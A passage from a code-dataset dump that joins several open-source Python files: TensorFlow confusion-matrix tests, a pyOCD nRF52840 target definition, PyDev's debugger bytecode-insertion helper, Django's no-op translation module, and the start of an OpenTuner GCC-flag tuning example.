[0, 0, 0, 1, 0, 0, 0]],
dtype=dtype)
self._testConfMatrix(labels=labels, predictions=predictions, truth=truth)
@test_util.run_deprecated_v1
def testInt32DifferentLabels(self, dtype=np.int32):
self._testDifferentLabelsInPredictionAndTarget(dtype)
@test_util.run_deprecated_v1
def testInt64DifferentLabels(self, dtype=np.int64):
self._testDifferentLabelsInPredictionAndTarget(dtype)
def _testMultipleLabels(self, dtype):
labels = np.asarray([1, 1, 2, 3, 5, 1, 3, 6, 3, 1], dtype=dtype)
predictions = np.asarray([1, 1, 2, 3, 5, 6, 1, 2, 3, 4], dtype=dtype)
truth = np.asarray(
[[0, 0, 0, 0, 0, 0, 0],
[0, 2, 0, 0, 1, 0, 1],
[0, 0, 1, 0, 0, 0, 0],
[0, 1, 0, 2, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 0]],
dtype=dtype)
self._testConfMatrix(labels=labels, predictions=predictions, truth=truth)
@test_util.run_deprecated_v1
def testInt32MultipleLabels(self, dtype=np.int32):
self._testMultipleLabels(dtype)
@test_util.run_deprecated_v1
def testInt64MultipleLabels(self, dtype=np.int64):
self._testMultipleLabels(dtype)
@test_util.run_deprecated_v1
def testWeighted(self):
labels = np.arange(5, dtype=np.int32)
predictions = np.arange(5, dtype=np.int32)
weights = np.arange(5, dtype=np.int32)
truth = np.asarray(
[[0, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 2, 0, 0],
[0, 0, 0, 3, 0],
[0, 0, 0, 0, 4]],
dtype=np.int32)
self._testConfMatrix(
labels=labels, predictions=predictions, weights=weights, truth=truth)
@test_util.run_deprecated_v1
def testLabelsTooLarge(self):
labels = np.asarray([1, 1, 0, 3, 5], dtype=np.int32)
predictions = np.asarray([2, 1, 0, 2, 2], dtype=np.int32)
with self.assertRaisesOpError("`labels`.*x < y"):
self._testConfMatrix(
labels=labels, predictions=predictions, num_classes=3, truth=None)
def testLabelsNegative(self):
labels = np.asarray([1, 1, 0, -1, -1], dtype=np.int32)
predictions = np.asarray([2, 1, 0, 2, 2], dtype=np.int32)
with self.assertRaisesOpError("`labels`.*negative values"):
self._testConfMatrix(
labels=labels, predictions=predictions, num_classes=3, truth=None)
@test_util.run_deprecated_v1
def testPredictionsTooLarge(self):
labels = np.asarray([1, 1, 0, 2, 2], dtype=np.int32)
predictions = np.asarray([2, 1, 0, 3, 5], dtype=np.int32)
with self.assertRaisesOpError("`predictions`.*x < y"):
self._testConfMatrix(
labels=labels, predictions=predictions, num_classes=3, truth=None)
def testPredictionsNegative(self):
labels = np.asarray([1, 1, 0, 2, 2], dtype=np.int32)
predictions = np.asarray([2, 1, 0, -1, -1], dtype=np.int32)
with self.assertRaisesOpError("`predictions`.*negative values"):
self._testConfMatrix(
labels=labels, predictions=predictions, num_classes=3, truth=None)
@test_util.run_deprecated_v1
def testInputDifferentSize(self):
labels = np.asarray([1, 2])
predictions = np.asarray([1, 2, 3])
self.assertRaisesRegexp(ValueError, "must be equal",
confusion_matrix.confusion_matrix, predictions,
labels)
def testOutputIsInt32(self):
labels = np.arange(2)
predictions = np.arange(2)
with self.cached_session():
cm = confusion_matrix.confusion_matrix(
labels, predictions, dtype=dtypes.int32)
tf_cm = self.evaluate(cm)
self.assertEqual(tf_cm.dtype, np.int32)
def testOutputIsInt64(self):
labels = np.arange(2)
predictions = np.arange(2)
with self.cached_session():
cm = confusion_matrix.confusion_matrix(
labels, predictions, dtype=dtypes.int64)
tf_cm = self.evaluate(cm)
self.assertEqual(tf_cm.dtype, np.int64)
class RemoveSqueezableDimensionsTest(test.TestCase):
@test_util.run_deprecated_v1
def testBothScalarShape(self):
label_values = 1.0
prediction_values = 0.0
static_labels, static_predictions = (
confusion_matrix.remove_squeezable_dimensions(
label_values, prediction_values))
labels_placeholder = array_ops.placeholder(dtype=dtypes.float32)
predictions_placeholder = array_ops.placeholder(dtype=dtypes.float32)
dynamic_labels, dynamic_predictions = (
confusion_matrix.remove_squeezable_dimensions(
labels_placeholder, predictions_placeholder))
with self.cached_session():
self.assertAllEqual(label_values, self.evaluate(static_labels))
self.assertAllEqual(prediction_values, self.evaluate(static_predictions))
feed_dict = {
labels_placeholder: label_values,
predictions_placeholder: prediction_values
}
self.assertAllEqual(
label_values, dynamic_labels.eval(feed_dict=feed_dict))
self.assertAllEqual(
prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
@test_util.run_deprecated_v1
def testSameShape(self):
label_values = np.ones(shape=(2, 3, 1))
prediction_values = np.zeros_like(label_values)
static_labels, static_predictions = (
confusion_matrix.remove_squeezable_dimensions(
label_values, prediction_values))
labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
dynamic_labels, dynamic_predictions = (
confusion_matrix.remove_squeezable_dimensions(
labels_placeholder, predictions_placeholder))
with self.cached_session():
self.assertAllEqual(label_values, self.evaluate(static_labels))
self.assertAllEqual(prediction_values, self.evaluate(static_predictions))
feed_dict = {
labels_placeholder: label_values,
predictions_placeholder: prediction_values
}
self.assertAllEqual(
label_values, dynamic_labels.eval(feed_dict=feed_dict))
self.assertAllEqual(
prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
@test_util.run_deprecated_v1
def testSameShapeExpectedRankDiff0(self):
label_values = np.ones(shape=(2, 3, 1))
prediction_values = np.zeros_like(label_values)
static_labels, static_predictions = (
confusion_matrix.remove_squeezable_dimensions(
label_values, prediction_values, expected_rank_diff=0))
labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
dynamic_labels, dynamic_predictions = (
confusion_matrix.remove_squeezable_dimensions(
labels_placeholder, predictions_placeholder, expected_rank_diff=0))
with self.cached_session():
self.assertAllEqual(label_values, self.evaluate(static_labels))
self.assertAllEqual(prediction_values, self.evaluate(static_predictions))
feed_dict = {
labels_placeholder: label_values,
predictions_placeholder: prediction_values
}
self.assertAllEqual(
label_values, dynamic_labels.eval(feed_dict=feed_dict))
self.assertAllEqual(
prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
@test_util.run_deprecated_v1
def testSqueezableLabels(self):
label_values = np.ones(shape=(2, 3, 1))
prediction_values = np.zeros(shape=(2, 3))
static_labels, static_predictions = (
confusion_matrix.remove_squeezable_dimensions(
label_values, prediction_values))
labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
dynamic_labels, dynamic_predictions = (
confusion_matrix.remove_squeezable_dimensions(
labels_placeholder, predictions_placeholder))
expected_label_values = np.reshape(label_values, newshape=(2, 3))
with self.cached_session():
self.assertAllEqual(expected_label_values, self.evaluate(static_labels))
self.assertAllEqual(prediction_values, self.evaluate(static_predictions))
feed_dict = {
labels_placeholder: label_values,
predictions_placeholder: prediction_values
}
self.assertAllEqual(
expected_label_values, dynamic_labels.eval(feed_dict=feed_dict))
self.assertAllEqual(
prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
@test_util.run_deprecated_v1
def testSqueezableLabelsExpectedRankDiffPlus1(self):
label_values = np.ones(shape=(2, 3, 1))
prediction_values = np.zeros(shape=(2, 3, 5))
static_labels, static_predictions = (
confusion_matrix.remove_squeezable_dimensions(
label_values, prediction_values, expected_rank_diff=1))
labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
dynamic_labels, dynamic_predictions = (
confusion_matrix.remove_squeezable_dimensions(
labels_placeholder, predictions_placeholder, expected_rank_diff=1))
expected_label_values = np.reshape(label_values, newshape=(2, 3))
with self.cached_session():
self.assertAllEqual(expected_label_values, self.evaluate(static_labels))
self.assertAllEqual(prediction_values, self.evaluate(static_predictions))
feed_dict = {
labels_placeholder: label_values,
predictions_placeholder: prediction_values
}
self.assertAllEqual(
expected_label_values, dynamic_labels.eval(feed_dict=feed_dict))
self.assertAllEqual(
prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
@test_util.run_deprecated_v1
def testSqueezablePredictions(self):
label_values = np.ones(shape=(2, 3))
prediction_values = np.zeros(shape=(2, 3, 1))
static_labels, static_predictions = (
confusion_matrix.remove_squeezable_dimensions(
label_values, prediction_values))
labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
dynamic_labels, dynamic_predictions = (
confusion_matrix.remove_squeezable_dimensions(
labels_placeholder, predictions_placeholder))
expected_prediction_values = np.reshape(prediction_values, newshape=(2, 3))
with self.cached_session():
self.assertAllEqual(label_values, self.evaluate(static_labels))
self.assertAllEqual(expected_prediction_values,
self.evaluate(static_predictions))
feed_dict = {
labels_placeholder: label_values,
predictions_placeholder: prediction_values
}
self.assertAllEqual(
label_values, dynamic_labels.eval(feed_dict=feed_dict))
self.assertAllEqual(
expected_prediction_values,
dynamic_predictions.eval(feed_dict=feed_dict))
@test_util.run_deprecated_v1
def testSqueezablePredictionsExpectedRankDiffMinus1(self):
label_values = np.ones(shape=(2, 3, 5))
prediction_values = np.zeros(shape=(2, 3, 1))
static_labels, static_predictions = (
confusion_matrix.remove_squeezable_dimensions(
label_values, prediction_values, expected_rank_diff=-1))
labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
dynamic_labels, dynamic_predictions = (
confusion_matrix.remove_squeezable_dimensions(
labels_placeholder, predictions_placeholder, expected_rank_diff=-1))
expected_prediction_values = np.reshape(prediction_values, newshape=(2, 3))
with self.cached_session():
self.assertAllEqual(label_values, self.evaluate(static_labels))
self.assertAllEqual(expected_prediction_values,
self.evaluate(static_predictions))
feed_dict = {
labels_placeholder: label_values,
predictions_placeholder: prediction_values
}
self.assertAllEqual(
label_values, dynamic_labels.eval(feed_dict=feed_dict))
self.assertAllEqual(
expected_prediction_values,
dynamic_predictions.eval(feed_dict=feed_dict))
@test_util.run_deprecated_v1
def testUnsqueezableLabels(self):
label_values = np.ones(shape=(2, 3, 2))
prediction_values = np.zeros(shape=(2, 3))
labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
_, dynamic_predictions = (
confusion_matrix.remove_squeezable_dimensions(labels_placeholder,
predictions_placeholder))
with self.cached_session():
feed_dict = {
labels_placeholder: label_values,
predictions_placeholder: prediction_values
}
self.assertAllEqual(
prediction_values, dynamic_predictions.eval(feed_dict=feed_dict))
@test_util.run_deprecated_v1
def testUnsqueezablePredictions(self):
label_values = np.ones(shape=(2, 3))
prediction_values = np.zeros(shape=(2, 3, 2))
labels_placeholder = array_ops.placeholder(dtype=dtypes.int32)
predictions_placeholder = array_ops.placeholder(dtype=dtypes.int32)
dynamic_labels, _ = (
confusion_matrix.remove_squeezable_dimensions(labels_placeholder,
predictions_placeholder))
with self.cached_session():
feed_dict = {
labels_placeholder: label_values,
predictions_placeholder: prediction_values
}
self.assertAllEqual(
label_values, dynamic_labels.eval(feed_dict=feed_dict))
if __name__ == "__main__":
test.main()
| apache-2.0 |
flit/pyOCD | pyocd/target/builtin/target_nRF52840_xxAA.py | 2 | 3222 | # pyOCD debugger
# Copyright (c) 2006-2013 Arm Limited
# Copyright (c) 2021 Chris Reed
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ...core.memory_map import (FlashRegion, RamRegion, MemoryMap)
from ...debug.svd.loader import SVDFile
from ..family.target_nRF52 import NRF52
FLASH_ALGO = { 'load_address' : 0x20000000,
'instructions' : [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x47702000, 0x47702000, 0x4c26b570, 0x60602002, 0x60e02001, 0x68284d24, 0xd00207c0, 0x60602000,
0xf000bd70, 0xe7f6f82c, 0x4c1eb570, 0x60612102, 0x4288491e, 0x2001d302, 0xe0006160, 0x4d1a60a0,
0xf81df000, 0x07c06828, 0x2000d0fa, 0xbd706060, 0x4605b5f8, 0x4813088e, 0x46142101, 0x4f126041,
0xc501cc01, 0x07c06838, 0x1e76d006, 0x480dd1f8, 0x60412100, 0xbdf84608, 0xf801f000, 0x480ce7f2,
0x06006840, 0xd00b0e00, 0x6849490a, 0xd0072900, 0x4a0a4909, 0xd00007c3, 0x1d09600a, 0xd1f90840,
0x00004770, 0x4001e500, 0x4001e400, 0x10001000, 0x40010400, 0x40010500, 0x40010600, 0x6e524635,
0x00000000, ],
'pc_init' : 0x20000021,
'pc_eraseAll' : 0x20000029,
'pc_erase_sector' : 0x20000049,
'pc_program_page' : 0x20000071,
'begin_data' : 0x20002000, # Analyzer uses a max of 0.5 KB data (128 pages * 4 bytes / page)
'page_buffers' : [0x20002000, 0x20003000], # Enable double buffering
'begin_stack' : 0x20001000,
'static_base' : 0x20000170,
'min_program_length' : 4,
'analyzer_supported' : True,
'analyzer_address' : 0x20004000 # Analyzer 0x20004000..0x20004600
}
class NRF52840(NRF52):
MEMORY_MAP = MemoryMap(
FlashRegion( start=0x0, length=0x100000, blocksize=0x1000, is_boot_memory=True,
algo=FLASH_ALGO),
# User Information Configation Registers (UICR) as a flash region
FlashRegion( start=0x10001000, length=0x400, blocksize=0x400, is_testable=False,
algo=FLASH_ALGO),
RamRegion( start=0x20000000, length=0x40000)
)
def __init__(self, session):
super(NRF52840, self).__init__(session, self.MEMORY_MAP)
def resetn(self):
"""
reset a core. After a call to this function, the core
is running
"""
self.reset()
| apache-2.0 |
JetBrains/intellij-community | python/helpers/pydev/_pydevd_frame_eval/pydevd_modify_bytecode.py | 12 | 13454 | import dis
import sys
import traceback
from collections import namedtuple
from opcode import opmap, EXTENDED_ARG, HAVE_ARGUMENT
from types import CodeType
MAX_BYTE = 255
RETURN_VALUE_SIZE = 2
def _add_attr_values_from_insert_to_original(original_code, insert_code, insert_code_list, attribute_name, op_list):
"""
This function appends values of the attribute `attribute_name` of the inserted code to the original values,
and changes indexes inside inserted code. If some bytecode instruction in the inserted code used to call argument
number i, after modification it calls argument n + i, where n - length of the values in the original code.
So it helps to avoid variables mixing between two pieces of code.
:param original_code: code to modify
:param insert_code: code to insert
:param insert_code_obj: bytes sequence of inserted code, which should be modified too
:param attribute_name: name of attribute to modify ('co_names', 'co_consts' or 'co_varnames')
:param op_list: sequence of bytecodes whose arguments should be changed
:return: modified bytes sequence of the code to insert and new values of the attribute `attribute_name` for
original code
"""
orig_value = getattr(original_code, attribute_name)
insert_value = getattr(insert_code, attribute_name)
orig_names_len = len(orig_value)
code_with_new_values = list(insert_code_list)
offset = 0
while offset < len(code_with_new_values):
op = code_with_new_values[offset]
if op in op_list:
new_val = code_with_new_values[offset + 1] + orig_names_len
if new_val > MAX_BYTE:
code_with_new_values[offset + 1] = new_val & MAX_BYTE
code_with_new_values = code_with_new_values[:offset] + [EXTENDED_ARG, new_val >> 8] + \
code_with_new_values[offset:]
offset += 2
else:
code_with_new_values[offset + 1] = new_val
offset += 2
new_values = orig_value + insert_value
return bytes(code_with_new_values), new_values
def _modify_new_lines(code_to_modify, all_inserted_code):
"""
Generate a new bytecode instruction to line number mapping aka ``lnotab`` after injecting the debugger specific code.
Note, that the bytecode inserted should be the last instruction of the line preceding a line with the breakpoint.
:param code_to_modify: the original code in which we injected new instructions.
:type code_to_modify: :py:class:`types.CodeType`
:param all_inserted_code: a list of modifications done. Each modification is given as a named tuple with
the first field ``offset`` which is the instruction offset and ``code_list`` which is the list of instructions
have been injected.
:type all_inserted_code: list
:return: bytes sequence of code with updated lines offsets which can be passed as the ``lnotab`` parameter of the
:py:class:`types.CodeType` constructor.
"""
# There's a nice overview of co_lnotab in
# https://github.com/python/cpython/blob/3.6/Objects/lnotab_notes.txt
if code_to_modify.co_firstlineno == 1 and len(all_inserted_code) > 0 and all_inserted_code[0].offset == 0 \
and code_to_modify.co_name == '<module>':
# There's a peculiarity here: if a breakpoint is added in the first line of a module, we
# can't replace the code because we require a line event to stop and the live event
# was already generated, so, fallback to tracing.
return None
new_list = list(code_to_modify.co_lnotab)
if not new_list:
# Could happen on a lambda (in this case, a breakpoint in the lambda should fallback to
# tracing).
return None
byte_increments = code_to_modify.co_lnotab[0::2]
line_increments = code_to_modify.co_lnotab[1::2]
all_inserted_code = sorted(all_inserted_code, key=lambda x: x.offset)
# As all numbers are relative, what we want is to hide the code we inserted in the previous line
# (it should be the last thing right before we increment the line so that we have a line event
# right after the inserted code).
addr = 0
it = zip(byte_increments, line_increments)
k = inserted_so_far = 0
for i, (byte_incr, _line_incr) in enumerate(it):
addr += byte_incr
if addr == (all_inserted_code[k].offset - inserted_so_far):
bytecode_delta = len(all_inserted_code[k].code_list)
inserted_so_far += bytecode_delta
new_list[i * 2] += bytecode_delta
k += 1
if k >= len(all_inserted_code):
break
return bytes(new_list)
def _unpack_opargs(code, inserted_code_list, current_index):
"""
Modified version of `_unpack_opargs` function from module `dis`.
We have to use it, because sometimes code can be in an inconsistent state: if EXTENDED_ARG
operator was introduced into the code, but it hasn't been inserted into `code_list` yet.
In this case we can't use standard `_unpack_opargs` and we should check whether there are
some new operators in `inserted_code_list`.
"""
extended_arg = 0
for i in range(0, len(code), 2):
op = code[i]
if op >= HAVE_ARGUMENT:
if not extended_arg:
# in case if we added EXTENDED_ARG, but haven't inserted it to the source code yet.
for code_index in range(current_index, len(inserted_code_list)):
inserted_offset, inserted_code = inserted_code_list[code_index]
if inserted_offset == i and inserted_code[0] == EXTENDED_ARG:
extended_arg = inserted_code[1] << 8
arg = code[i + 1] | extended_arg
extended_arg = (arg << 8) if op == EXTENDED_ARG else 0
else:
arg = None
yield (i, op, arg)
def _update_label_offsets(code_obj, breakpoint_offset, breakpoint_code_list):
"""
Update labels for the relative and absolute jump targets
:param code_obj: code to modify
:param breakpoint_offset: offset for the inserted code
:param breakpoint_code_list: list of bytes to insert
:return: bytes sequence with modified labels; list of named tuples (resulting offset, list of code instructions) with
information about all inserted pieces of code
"""
all_inserted_code = list()
InsertedCode = namedtuple('InsertedCode', ['offset', 'code_list'])
# the list with all inserted pieces of code
all_inserted_code.append(InsertedCode(breakpoint_offset, breakpoint_code_list))
code_list = list(code_obj)
j = 0
while j < len(all_inserted_code):
current_offset, current_code_list = all_inserted_code[j]
offsets_for_modification = []
# We iterate through the code, find all the jump instructions and update the labels they are pointing to.
# There is no reason to update anything other than jumps because only jumps are affected by code injections.
for offset, op, arg in _unpack_opargs(code_list, all_inserted_code, j):
if arg is not None:
if op in dis.hasjrel:
# has relative jump target
label = offset + 2 + arg
# reminder: current offset is the place where we inject code
if offset < current_offset < label:
# change labels for relative jump targets if code was inserted between the instruction and the jump label
offsets_for_modification.append(offset)
elif op in dis.hasjabs:
# change label for absolute jump if code was inserted before it
if current_offset < arg:
offsets_for_modification.append(offset)
for i in offsets_for_modification:
op = code_list[i]
if op >= dis.HAVE_ARGUMENT:
new_arg = code_list[i + 1] + len(current_code_list)
if new_arg <= MAX_BYTE:
code_list[i + 1] = new_arg
else:
# handle bytes overflow
if i - 2 > 0 and code_list[i - 2] == EXTENDED_ARG and code_list[i - 1] < MAX_BYTE:
# if new argument > 255 and EXTENDED_ARG already exists we need to increase it's argument
code_list[i - 1] += 1
else:
# if there isn't EXTENDED_ARG operator yet we have to insert the new operator
extended_arg_code = [EXTENDED_ARG, new_arg >> 8]
all_inserted_code.append(InsertedCode(i, extended_arg_code))
code_list[i + 1] = new_arg & MAX_BYTE
code_list = code_list[:current_offset] + current_code_list + code_list[current_offset:]
for k in range(len(all_inserted_code)):
offset, inserted_code_list = all_inserted_code[k]
if current_offset < offset:
all_inserted_code[k] = InsertedCode(offset + len(current_code_list), inserted_code_list)
j += 1
return bytes(code_list), all_inserted_code
def _return_none_fun():
return None
def add_jump_instruction(jump_arg, code_to_insert):
"""
Note: although it's adding a POP_JUMP_IF_TRUE, it's actually no longer used now
(we could only return the return and possibly the load of the 'None' before the
return -- not done yet because it needs work to fix all related tests).
"""
extended_arg_list = []
if jump_arg > MAX_BYTE:
extended_arg_list += [EXTENDED_ARG, jump_arg >> 8]
jump_arg = jump_arg & MAX_BYTE
# remove 'RETURN_VALUE' instruction and add 'POP_JUMP_IF_TRUE' with (if needed) 'EXTENDED_ARG'
return list(code_to_insert.co_code[:-RETURN_VALUE_SIZE]) + extended_arg_list + [opmap['POP_JUMP_IF_TRUE'], jump_arg]
_created = {}
def insert_code(code_to_modify, code_to_insert, before_line):
# This check is needed for generator functions, because after each yield a new frame is created
# but the former code object is used.
ok_and_curr_before_line = _created.get(code_to_modify)
if ok_and_curr_before_line is not None:
ok, curr_before_line = ok_and_curr_before_line
if not ok:
return False, code_to_modify
if curr_before_line == before_line:
return True, code_to_modify
return False, code_to_modify
ok, new_code = _insert_code(code_to_modify, code_to_insert, before_line)
_created[new_code] = ok, before_line
return ok, new_code
def _insert_code(code_to_modify, code_to_insert, before_line):
"""
Insert piece of code `code_to_insert` to `code_to_modify` right inside the line `before_line` before the
instruction on this line by modifying original bytecode
:param code_to_modify: Code to modify
:param code_to_insert: Code to insert
:param before_line: Number of line for code insertion
:return: boolean flag whether insertion was successful, modified code
"""
linestarts = dict(dis.findlinestarts(code_to_modify))
if before_line not in linestarts.values():
return False, code_to_modify
offset = None
for off, line_no in linestarts.items():
if line_no == before_line:
offset = off
break
code_to_insert_list = add_jump_instruction(offset, code_to_insert)
try:
code_to_insert_list, new_names = \
_add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_names',
dis.hasname)
code_to_insert_list, new_consts = \
_add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_consts',
[opmap['LOAD_CONST']])
code_to_insert_list, new_vars = \
_add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_varnames',
dis.haslocal)
new_bytes, all_inserted_code = _update_label_offsets(code_to_modify.co_code, offset, list(code_to_insert_list))
new_lnotab = _modify_new_lines(code_to_modify, all_inserted_code)
if new_lnotab is None:
return False, code_to_modify
except ValueError:
traceback.print_exc()
return False, code_to_modify
args = [
code_to_modify.co_argcount, # integer
code_to_modify.co_kwonlyargcount, # integer
len(new_vars), # integer
code_to_modify.co_stacksize, # integer
code_to_modify.co_flags, # integer
new_bytes, # bytes
new_consts, # tuple
new_names, # tuple
new_vars, # tuple
code_to_modify.co_filename, # string
code_to_modify.co_name, # string
code_to_modify.co_firstlineno, # integer
new_lnotab, # bytes
code_to_modify.co_freevars, # tuple
code_to_modify.co_cellvars # tuple
]
if sys.version_info >= (3, 8, 0):
# Python 3.8 and above supports positional-only parameters. The number of such
# parameters is passed to the constructor as the second argument.
args.insert(1, code_to_modify.co_posonlyargcount)
new_code = CodeType(*args)
return True, new_code
| apache-2.0 |
django-nonrel/django-nonrel | django/utils/translation/trans_null.py | 241 | 2648 | # These are versions of the functions in django.utils.translation.trans_real
# that don't actually do anything. This is purely for performance, so that
# settings.USE_I18N = False can use this module rather than trans_real.py.
import warnings
from django.conf import settings
from django.utils.encoding import force_unicode
from django.utils.safestring import mark_safe, SafeData
def ngettext(singular, plural, number):
if number == 1: return singular
return plural
ngettext_lazy = ngettext
def ungettext(singular, plural, number):
return force_unicode(ngettext(singular, plural, number))
def pgettext(context, message):
return ugettext(message)
def npgettext(context, singular, plural, number):
return ungettext(singular, plural, number)
activate = lambda x: None
deactivate = deactivate_all = lambda: None
get_language = lambda: settings.LANGUAGE_CODE
get_language_bidi = lambda: settings.LANGUAGE_CODE in settings.LANGUAGES_BIDI
check_for_language = lambda x: True
# date formats shouldn't be used using gettext anymore. This
# is kept for backward compatibility
TECHNICAL_ID_MAP = {
"DATE_WITH_TIME_FULL": settings.DATETIME_FORMAT,
"DATE_FORMAT": settings.DATE_FORMAT,
"DATETIME_FORMAT": settings.DATETIME_FORMAT,
"TIME_FORMAT": settings.TIME_FORMAT,
"YEAR_MONTH_FORMAT": settings.YEAR_MONTH_FORMAT,
"MONTH_DAY_FORMAT": settings.MONTH_DAY_FORMAT,
}
def gettext(message):
result = TECHNICAL_ID_MAP.get(message, message)
if isinstance(message, SafeData):
return mark_safe(result)
return result
def ugettext(message):
return force_unicode(gettext(message))
gettext_noop = gettext_lazy = _ = gettext
def to_locale(language):
p = language.find('-')
if p >= 0:
return language[:p].lower()+'_'+language[p+1:].upper()
else:
return language.lower()
def get_language_from_request(request):
return settings.LANGUAGE_CODE
# get_date_formats and get_partial_date_formats aren't used anymore by Django
# but are kept for backward compatibility.
def get_date_formats():
warnings.warn(
'`django.utils.translation.get_date_formats` is deprecated. '
'Please update your code to use the new i18n aware formatting.',
DeprecationWarning
)
return settings.DATE_FORMAT, settings.DATETIME_FORMAT, settings.TIME_FORMAT
def get_partial_date_formats():
warnings.warn(
'`django.utils.translation.get_partial_date_formats` is deprecated. '
'Please update your code to use the new i18n aware formatting.',
DeprecationWarning
)
return settings.YEAR_MONTH_FORMAT, settings.MONTH_DAY_FORMAT
| bsd-3-clause |
ucb-sejits/opentuner | examples/gccflags/gccflags.py | 6 | 16150 | #!/usr/bin/env python
import adddeps # fix sys.path
import math
import argparse
import ast
import collections
import json
import logging
import opentuner
import os
import random
import re
import shutil
import subprocess
import sys
from opentuner.resultsdb.models import Result, TuningRun
from opentuner.search import manipulator
FLAGS_WORKING_CACHE_FILE = 'cc_flags.json'
PARAMS_DEFAULTS_CACHE_FILE = 'cc_param_defaults.json'
PARAMS_DEF_PATH = '~/gcc-4.9.0/gcc/params.def'
PARAMS_WORKING_CACHE_FILE = 'cc_params.json'
log = logging.getLogger('gccflags')
argparser = argparse.ArgumentParser(parents=opentuner.argparsers())
argparser.add_argument('source', help='source file to compile')
argparser.add_argument('--compile-template',
default='{cc} {source} -o {output} -lpthread {flags}',
help='command to compile {source} into {output} with'
' {flags}')
argparser.add_argument('--compile-limit', type=float, default=30,
help='kill gcc if it runs more than {default} sec')
argparser.add_argument('--scaler', type=int, default=4,
help='by what factor to try increasing parameters')
argparser.add_argument('--cc', default='g++', help='g++ or gcc')
argparser.add_argument('--output', default='./tmp.bin',
help='temporary file for compiler to write to')
argparser.add_argument('--debug', action='store_true',
help='on gcc errors try to find minimal set '
'of args to reproduce error')
argparser.add_argument('--force-killall', action='store_true',
help='killall cc1plus before each collection')
argparser.add_argument('--memory-limit', default=1024 ** 3, type=int,
help='memory limit for child process')
argparser.add_argument('--no-cached-flags', action='store_true',
help='regenerate the lists of legal flags each time')
argparser.add_argument('--flags-histogram', action='store_true',
help='print out a histogram of flags')
argparser.add_argument('--flag-importance',
help='Test the importance of different flags from a '
'given json file.')
class GccFlagsTuner(opentuner.measurement.MeasurementInterface):
def __init__(self, *pargs, **kwargs):
super(GccFlagsTuner, self).__init__(program_name=args.source, *pargs,
**kwargs)
self.gcc_version = self.extract_gcc_version()
self.cc_flags = self.extract_working_flags()
self.cc_param_defaults = self.extract_param_defaults()
self.cc_params = self.extract_working_params()
# these bugs are hardcoded for now
# sets of options which causes gcc to barf
if True:
# These bugs were for gcc 4.7 on ubuntu
self.cc_bugs = (['-fipa-matrix-reorg', '-fwhole-program'],
['-fno-tree-coalesce-inlined-vars'],
['-fno-inline-atomics'],
['-ftoplevel-reorder', '-fno-unit-at-a-time'])
else:
# Bugs for gcc 4.9 (work in progress, incomplete list)
self.cc_bugs = (['-ftoplevel-reorder', '-fno-unit-at-a-time'], )
self.result_list = {}
self.parallel_compile = True
try:
os.stat('./tmp')
except OSError:
os.mkdir('./tmp')
self.run_baselines()
def run_baselines(self):
log.info("baseline perfs -O0=%.4f -O1=%.4f -O2=%.4f -O3=%.4f",
*[self.run_with_flags(['-O%d' % i], None).time
for i in range(4)])
def extract_gcc_version(self):
m = re.search(r'([0-9]+)[.]([0-9]+)[.]([0-9]+)', subprocess.check_output([
self.args.cc, '--version']))
if m:
gcc_version = tuple(map(int, m.group(1, 2, 3)))
else:
gcc_version = None
log.debug('gcc version %s', gcc_version)
return gcc_version
def extract_working_flags(self):
"""
Figure out which gcc flags work (don't cause gcc to barf) by running
each one.
"""
if os.path.isfile(FLAGS_WORKING_CACHE_FILE) and not args.no_cached_flags:
# use cached version
found_cc_flags = json.load(open(FLAGS_WORKING_CACHE_FILE))
else:
# extract flags from --help=optimizers
optimizers, err = subprocess.Popen([self.args.cc, '--help=optimizers'],
stdout=subprocess.PIPE).communicate()
found_cc_flags = re.findall(r'^ (-f[a-z0-9-]+) ', optimizers,
re.MULTILINE)
log.info('Determining which of %s possible gcc flags work',
len(found_cc_flags))
found_cc_flags = filter(self.check_if_flag_works, found_cc_flags)
json.dump(found_cc_flags, open(FLAGS_WORKING_CACHE_FILE, 'w'))
return found_cc_flags
def extract_param_defaults(self):
"""
Get the default, minimum, and maximum for each gcc parameter.
Requires source code for gcc to be in your home directory.
This example ships with a cached version so it does not require source.
"""
if os.path.isfile(PARAMS_DEFAULTS_CACHE_FILE) and not args.no_cached_flags:
# use cached version
param_defaults = json.load(open(PARAMS_DEFAULTS_CACHE_FILE))
else:
# default values of params need to be extracted from source code,
# since they are not in --help
param_defaults = dict()
params_def = open(os.path.expanduser(PARAMS_DEF_PATH)).read()
for m in re.finditer(r'DEFPARAM *\((([^")]|"[^"]*")*)\)', params_def):
param_def_str = (m.group(1)
# Hacks!!!
